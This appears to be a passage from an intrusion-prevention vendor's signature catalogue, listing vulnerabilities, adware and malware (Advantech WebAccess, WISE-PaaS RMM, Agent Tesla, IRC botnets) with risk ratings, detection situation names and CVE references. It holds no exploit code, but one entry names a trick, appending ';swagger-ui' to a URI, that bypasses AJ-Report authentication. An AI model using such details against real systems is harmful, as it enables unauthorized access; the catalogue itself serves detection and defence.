https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856

Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Advantech WebAccess

Type:

Malfunction

Description:

A vulnerability in Advantech WebAccess

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow

References:

CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856

Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

An improper boundary check in the RPC interface of Advantech WebAccess results in a vulnerability which can be exploited to gain System-privileged code execution on the target host.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow

References:

CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856

Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-755-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

An improper boundary check in the RPC interface of Advantech WebAccess results in a vulnerability which can be exploited to gain System-privileged code execution on the target host.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow

References:

CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856

Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-747-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Advantech WebAccess can be exploited with a crafted MSRPC request, allowing an attacker to execute code on the target system with the privileges of the SYSTEM user.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow

References:

CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856

Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1212-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

There exists a pre-auth XXE vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in disclosure of file contents.

Situation:

HTTP_CRL-Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection

References:

CVE-2019-18227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18227

Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1220-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

A SQL injection exists in Advantech WISE-PaaS RMM. The vulnerability is due to insufficient input validation when processing HTTP requests in the Java class DeviceMgmt. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests. Successful exploitation could result in the code execution under the security context of the database process.

Situation:

HTTP_CRL-Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection

References:

CVE-2019-18229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18229

Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1210-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

There exists a pre-auth XXE vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in disclosure of file contents.

Situation:

HTTP_CRL-Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection

References:

CVE-2019-18227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18227

Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1211-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

A SQL injection exists in Advantech WISE-PaaS RMM. The vulnerability is due to insufficient input validation when processing HTTP requests in the Java class SQLMgmt. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests. Successful exploitation could result in the code execution under the security context of the database process.

Situation:

HTTP_CRL-Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection

References:

CVE-2019-18229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18229

Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1242-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

Improper input validation when processing HTTP requests in the Java class SQLMgmt causes an SQL injection vulnerability in Advantech WISE PaaS. A successful exploit may allow an attacker to execute code with the privileges of the database.

Situation:

File-Text_Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection

References:

CVE-2019-18229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18229

Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1215-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

There is a post-auth arbitrary file upload vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in arbitrary file write and code execution.

Situation:

HTTP_CS-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
HTTP_CRL-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload

References:

CVE-2019-13551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13551

Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WISE-PaaS RMM

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

There exists a vulnerability in Advantech WISE-PaaS RMM, versions 3.3.29 and before, which allows remote attackers to upload arbitrary files and execute remote code, due to the insufficient input validation in the DeviceMapMgmt Java class.

Situation:

HTTP_CS-Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload

References:

CVE-2019-13551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13551

Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection

About this vulnerability:

A vulnerability in Advantech WISE-PaaS/RMM

Risk:

Moderate

First detected in:

sgpkg-ips-1222-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WISE-PaaS RMM

Type:

Input Validation

Description:

There has been reported a pre-auth XXE vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in information disclosure.

Situation:

HTTP_CRL-Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection

References:

CVE-2019-18227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18227

Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181

About this vulnerability:

A vulnerability in Advantive VeraCore

Risk:

High

First detected in:

sgpkg-ips-1857-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Generic

Software:

Advantive VeraCore

Type:

SQL Injection

Description:

An SQL injection vulnerability in Advantive VeraCore allows unauthenticated attackers to execute arbitrary SQL commands via a crafted HTTP parameter value. This vulnerability can be leveraged for obtaining any existing VeraCore user credentials, allowing further compromise of the software.

Situation:

HTTP_CRL-Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181

References:

CVE-2025-25181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25181

Adware-180sa

About this vulnerability:	Adware 180SA
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	180SA
Type:	Misconfiguration
Description:	180SA is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-180sa HTTP_CSH-Adware-180sa

Adware-Adroar

About this vulnerability:	Adware Adroar
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Adroar
Type:	Misconfiguration
Description:	Adroar is an adware that can generate pop-up ads. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Adroar

Adware-Adtomi

About this vulnerability:	Adware Adtomi
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Adtomi
Type:	Misconfiguration
Description:	Adtomi is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Adtomi HTTP_CSH-Adware-Adtomi

Adware-Bdsearch

About this vulnerability:	Adware BDSearch
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	BDSearch
Type:	Misconfiguration
Description:	BDSearch is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Bdsearch

Adware-Casclient

About this vulnerability:	Adware CasClient
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	CasClient
Type:	Misconfiguration
Description:	CasClient is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Casclient

Adware-Commonname

About this vulnerability:	Adware CommonName
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	CommonName
Type:	Misconfiguration
Description:	CommonName is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Commonname HTTP_CSH-Adware-Commonname

Adware-Exactsearch

About this vulnerability:	Adware Exactsearch
Risk:	Low
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Exactsearch
Type:	Misconfiguration
Description:	Exactsearch is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Exactsearch HTTP_CSH-Adware-Exactsearch

Adware-Ilookup

About this vulnerability:	Adware ILookup
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ILookup
Type:	Misconfiguration
Description:	ILookup is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Ilookup HTTP_CSH-Adware-Ilookup

Adware-mysearch

About this vulnerability:	Adware MySearch
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	MySearch
Type:	Misconfiguration
Description:	MySearch is a search bar application that integrates with Internet Explorer. It is not a virus or a trojan, however it is detected as a potentially unwanted program.
Situation:	HTTP_CSH-Adware-mysearch

Adware-Pornkings

About this vulnerability:	Adware PornKings
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PornKings
Type:	Misconfiguration
Description:	PornKings is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Pornkings

Adware-Rapidblaster

About this vulnerability:	Adware RapidBlaster
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RapidBlaster
Type:	Misconfiguration
Description:	RapidBlaster is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	Generic_UDP-W32/Nuwar@mm-Activity HTTP_CSH-Adware-Rapidblaster

Adware-Searchaid

About this vulnerability:	Adware SearchAid
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SearchAid
Type:	Misconfiguration
Description:	SearchAid is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Searchaid

Adware-Searchcentrix

About this vulnerability:	Adware Searchcentrix
Risk:	Low
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Searchcentrix
Type:	Misconfiguration
Description:	Searchcentrix is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Searchcentrix HTTP_CSH-Adware-Searchcentrix

Adware-Sidesearch

About this vulnerability:	Adware SideSearch
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SideSearch
Type:	Misconfiguration
Description:	Sidesearch is an adware that integrates with Internet Explorer. It is not a virus or a trojan, however it is detected as a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Sidesearch HTTP_CSH-Adware-Sidesearch

Adware-Slotch

About this vulnerability:	Adware Slotch
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Slotch
Type:	Misconfiguration
Description:	Slotch is an adware. It is detected as a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Slotch HTTP_CSH-Adware-Slotch

Adware-Tickerbar

About this vulnerability:	Adware TickerBar
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	TickerBar
Type:	Misconfiguration
Description:	TickerBar is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CS-Adware-Tickerbar HTTP_CSH-Adware-Tickerbar

Adware-Toolbarcc

About this vulnerability:	Adware ToolbarCC
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ToolbarCC
Type:	Misconfiguration
Description:	ToolbarCC is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Toolbarcc HTTP_CRL-Adware-Toolbarcc

Adware-Tvmedia

About this vulnerability:	Adware TVMedia
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	TVMedia
Type:	Misconfiguration
Description:	TVMedia is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Adware-Tvmedia HTTP_CSH-Adware-Tvmedia

Adware-Websearch

About this vulnerability:	Adware Websearch
Risk:	Low
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Websearch
Type:	Misconfiguration
Description:	Websearch is an adware that adds a toolbar to Internet Explorer. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adware-Websearch

Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE

About this vulnerability:

A vulnerability in Aerohive NetConfig

Risk:

High

First detected in:

sgpkg-ips-1421-5242

Last changed:

sgpkg-ips-1421-5242

Platform:

Generic

Software:

Aerohive NetConfig

Type:

Input Validation

Description:

A vulnerability in Aerohive NetConfig, versions 8.2r4 and 10.0r7a, which allows remote attackers to execute arbitrary code due to insufficient input validation to the userName parameter, allowing for local file inclusion and log poisoning attacks.

Situation:

HTTP_CRL-Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE

References:

CVE-2020-16152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16152

Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Aerospike Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-846-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Aerospike Database Server

Type:

Buffer Overflow

Description:

Improper bounds checks in Aerospike Database Server cause a stack buffer overflow vulnerability, which when successfully exploited can allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow

References:

CVE-2016-9052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9052

Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution

About this vulnerability:

A vulnerability in Aerospike Database Server

Risk:

High

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Aerospike Database Server

Type:

Malfunction

Description:

There exists an out-of-bounds array indexing vulnerability in Aerospike Database Server. A remote attacker can use this to cause a denial-of-service condition.

Situation:

Generic_CS-Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution

References:

CVE-2016-9053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9053

Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054

About this vulnerability:

A vulnerability in Aerospike Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-844-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Aerospike Database Server

Type:

Buffer Overflow

Description:

Situation:

Generic_CS-Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054

References:

CVE-2016-9054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9054

Agent-Tesla-C2-Traffic

About this vulnerability:	Agent Tesla C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1089-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Agent Tesla is a keystroke logger. It can send keystroke logs and screenshots from infected computers to remote servers using HTTP or SMTP protocol.
Situation:	HTTP_CRL-Agent-Tesla-C2-Traffic

Agent-Tesla-Malware-Infection-Traffic

About this vulnerability:	Agent Tesla malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1310-5242
Last changed:	sgpkg-ips-1310-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Agent Tesla malware infection traffic was detected.
Situation:	HTTP_CS-Agent-Tesla-Malware-Infection-Traffic

Agent-Tesla-Panel-Remote-Code-Execution

About this vulnerability:	A vulnerability in Agent Tesla.
Risk:	High
First detected in:	sgpkg-ips-1358-5242
Last changed:	sgpkg-ips-1358-5242
Platform:	Generic
Software:	Agent Tesla
Type:	Input Validation
Description:	A vulnerability in Agent Tesla, version released prior to Sepetember 12, 2018, allows remote attackers to execute arbitrary code using command injection combined with an SQL injection, due to insufficient input validation to certain parameters.
Situation:	HTTP_CS-Agent-Tesla-Panel-Remote-Code-Execution

Agent-Tesla-SMTP-Traffic

About this vulnerability:	Agent Tesla SMTP traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1091-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Agent Tesla is a keystroke logger. It can send keystroke logs and screenshots from infected computers to remote servers using HTTP or SMTP protocol.
Situation:	E-Mail_Agent-Tesla-SMTP-Traffic

AgentX++-Receive-PDU-Integer-Overflow

About this vulnerability:

A vulnerability in Frank Fock AgentX

Risk:

High

First detected in:

sgpkg-ips-303-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AgentX++

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in Frank Fock AgentX++. The vulnerability is due to an integer overflow error in AgentX::receive_agentx function that can lead to a heap buffer overflow. A remote unauthenticated attacker can exploit this vulnerability by sending maximum payload length value in a packet to the target server on port 705/TCP. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process.

Situation:

Generic_CS-AgentX++-Receive-PDU-Integer-Overflow

References:

CVE-2010-1319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1319

BID-39561
http://www.securityfocus.com/bid/39561

Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error

About this vulnerability:

A vulnerability in Agilent Technologies Feature Extraction

Risk:

Low

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Agilent Technologies Feature Extraction

Type:

Input Validation

Description:

An index boundary error vulnerability exists in Agilent Technologies Feature Extraction. The vulnerability is due to insufficient input validation on a parameter of Insert() method of the AnnotationX.AnnList.1 ActiveX control. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution in the context of the browser process.

Situation:

File-Text_Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error

References:

CVE-2015-2092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2092

OSVDB-118992
http://www.osvdb.org/118992

Agobot

About this vulnerability:	AgoBot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	AgoBot is a malware that creates a backdoor on the infected machine for a remote attacker to use. The infected machine can then be used for various malicious purposes.
Situation:	File-Text_Agobot-Traffic

Agora-Cgi-Cross-Site

About this vulnerability:

Agora.cgi cross-site debug mode vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Agora

Type:

Insecure Configuration

Description:

The Agora online shopping cart application can be exploited by creating links to malicious java scripts that are executed in the security context of the site. Agora must be set explicitly to debug mode by the administrator.

References:

CVE-2001-1199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1199

BID-3702
http://www.securityfocus.com/bid/3702

OSVDB-698
http://www.osvdb.org/698

Ahsay-Backup-Insecure-File-Upload

About this vulnerability:

A vulnerability in Ahsay Backup

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ahsay

Type:

Insecure Configuration

Description:

A vulnerability in Ahsay Backup, versions v7.x to v8.1.1.50, which allows remote attackers to upload arbitrary files into any directory on the server.

Situation:

HTTP_CRH-Ahsay-Backup-Insecure-File-Upload

References:

CVE-2019-10267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10267

Aim-Express-Usage

About this vulnerability:	AIM Express usage
Risk:	Moderate
First detected in:	sgpkg-ips-129-2032
Last changed:	sgpkg-ips-1555-5242
Platform:	Generic
Software:	AOL Instant Messenger
Type:	Instant Messenger
Description:	AIM Express is a web service which allows users to connect to other AOL Instant Messenger users through a web interface.

AIM-Triton-CSeq-Buffer-Overflow

About this vulnerability:

An AIM Triton CSeq Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-734-5211

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

AOL AIM Triton

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in AOL AIM Triton, version 1.0.4, which allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.

Situation:

SIP-UDP_AIM-Triton-CSeq-Buffer-Overflow

References:

CVE-2006-3524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524

BID-18906
http://www.securityfocus.com/bid/18906

OSVDB-27122
http://www.osvdb.org/27122

Ainslot.b-Malware

About this vulnerability:	Ainslot.B malware
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Ainslot.b is a Windows malware.
Situation:	Generic_CS-Ainslot.b-Traffic Generic_SS-Ainslot.b-Traffic HTTP_CSU-Ainslot.b-Traffic

Aiohttp-Directory-Traversal-CVE-2024-23334

About this vulnerability:

A vulnerability in aiohttp

Risk:

High

First detected in:

sgpkg-ips-1705-5242

Last changed:

sgpkg-ips-1705-5242

Platform:

Generic

Software:

aiohttp

Type:

Malfunction

Description:

A path traversal vulnerability has been reported in aiohttp versions before 3.9.2. An unauthenticated attacker can leverage this vulnerability to access arbitrary system files and obtain sensitive information such as passwords.

Situation:

HTTP_CSU-Aiohttp-Directory-Traversal-CVE-2024-23334

References:

CVE-2024-23334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23334

AirTies-RT-104-Router-Unauthorized-Config-Download

About this vulnerability:	A vulnerability in AirTies RT 104 routers
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	AirTies RT 104 Router
Type:	Malfunction
Description:	There is a vulnerability in AirTies rt104 routers that allows unauthorized download of the router configuration.
Situation:	HTTP_CSU-AirTies-RT-104-Router-Unauthorized-Config-Download

AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability

About this vulnerability:	A vulnerability in AirTies RT series routers
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	AirTies RT Series Routers
Type:	Malfunction
Description:	Multiple AirTies RT series routers use hardcoded crentials.
Situation:	HTTP_CSU-AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability

AIS-logistics-ESEL-Server-RCE

About this vulnerability:

A vulnerability in AIS logistics ESEL Server

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AIS logistics

Type:

Input Validation

Description:

A vulnerability in AIS logistics ESEL Server 67 which allows remote attackers to execute arbitrary code by way of SQL injection, due to improper authentication and sanitization of input.

Situation:

Generic_CS-AIS-logistics-ESEL-Server-RCE

References:

CVE-2019-10123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10123

AIX-Rlogin-Froot

About this vulnerability:

Malfunction in Aix login allows remote root

Risk:

High

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

<os>

Type:

Buffer Overflow

Description:

A serious security vulnerability in rlogin daemon exists in certain older unix systems. The vulnerability allows remote login to the vulnerable without passwd.

Situation:

RLOGIN_Froot-Remote-Compromise

References:

CVE-1999-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113

BID-458
http://www.securityfocus.com/bid/458

AJ-Report-Authentication-Bypass-CVE-2024-7314

About this vulnerability:

A vulnerability in AJ-Report

Risk:

High

First detected in:

sgpkg-ips-1824-5242

Last changed:

sgpkg-ips-1824-5242

Platform:

Generic

Software:

AJ-Report

Type:

Input Validation

Description:

A vulnerability in anji-plus AJ-Report server 1.4.0 allows a remote attacker to bypass authentication by appending ;swagger-ui to the request URI. This vulnerability can be combined with a Nashorn engine security filter bypass for unauthenticated remote code execution.

Situation:

HTTP_CRL-AJ-Report-Remote-Code-Execution-CVE-2024-7314
HTTP_CRL-AJ-Report-Potential-Authentication-Bypass-CVE-2024-7314

References:

CVE-2024-7314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7314

AjaxPro-Deserialization-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in AjaxPro detected

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Windows

Software:

AjaxPro

Type:

Input Validation

Description:

A vulnerability in AjaxPro, versions 21.10.30.1 and before, which allows remote attackers to execute arbitrary code due to an insecure deserialization of data.

Situation:

HTTP_CRL-AjaxPro-Deserialization-Remote-Code-Execution

References:

CVE-2021-23758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23758

Ajenti-Auth-Username-Command-Injection

About this vulnerability:	A vulnerability in Ajenti
Risk:	High
First detected in:	sgpkg-ips-1213-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Ajenti
Type:	Code Injection
Description:	There exists a vulnerability in Ajenti, version 2.1.31, which allows remote attackers to execute arbitrary code due to unsufficient sanitization of the username parameter in a POST to /api/core/auth.
Situation:	HTTP_CRL-Ajenti-Auth-Username-Command-Injection

Al3na.hotgirls-Botnet

About this vulnerability:	Al3na.hotgirls botnet
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Al2na.hotgirls is an IRC-controlled botnet.
Situation:	Generic_SS-Botnet-Al3na.hotgirls-Activity

Al3na.monster-Botnet

About this vulnerability:	Al3na.monster botnet
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Als3na.monster is an IRC-controlled botnet.
Situation:	Generic_SS-Botnet-Al3na.monster-Activity

Al3na.weakpatheticfool-Botnet

